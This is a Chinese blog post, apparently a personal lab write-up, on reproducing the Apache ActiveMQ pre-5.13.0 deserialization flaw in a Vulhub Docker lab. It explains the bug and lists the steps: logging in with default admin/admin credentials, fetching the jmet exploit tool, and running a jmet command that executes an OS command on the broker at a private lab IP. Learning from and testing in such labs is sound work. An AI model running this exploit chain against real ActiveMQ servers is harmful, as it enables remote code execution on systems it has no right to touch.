前提环境(我是照着这个师傅来的):kali下搭建Vulhub靶场(详细附图)_看我的眼色行事的博客-CSDN博客_kali搭建靶场
原理:Apache ActiveMQ 5.x 5.13.0 之前的安全漏洞,程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以使一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象利用此漏洞执行任意代码。
Active MQ 理解成一种apache上的服务,作用的是提供程序通信的服务。那么我的感觉就是这个漏洞可以理解成,这个代理服务在帮忙“发送”东西的时候,允许被夹带私货,而且这个私货可以被构建成反序列化的类,刚好这个反序列化的类又能被执行,这个样子。
操作流程参考:Vulhub - Docker-Compose file for vulnerability environment
获得的知识:5.13.0前的apache可能“挨揍”;这是个出现在中间件类型的漏洞,同时利用反序列化函数
流程:①登入管理②然后去下载被构建好的“私货”③让“私货”被执行④弹出shell)
①:登入 ip:8161
我的IP是:10.10.10.128
点击Manage ActiveMQ broker(管理ActiveMQ代理)账号/密码 admin/admin
②下载
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
③
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 10.10.10.128 61616
查看队列进程
④
docker-compose exec activemq bash
459
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
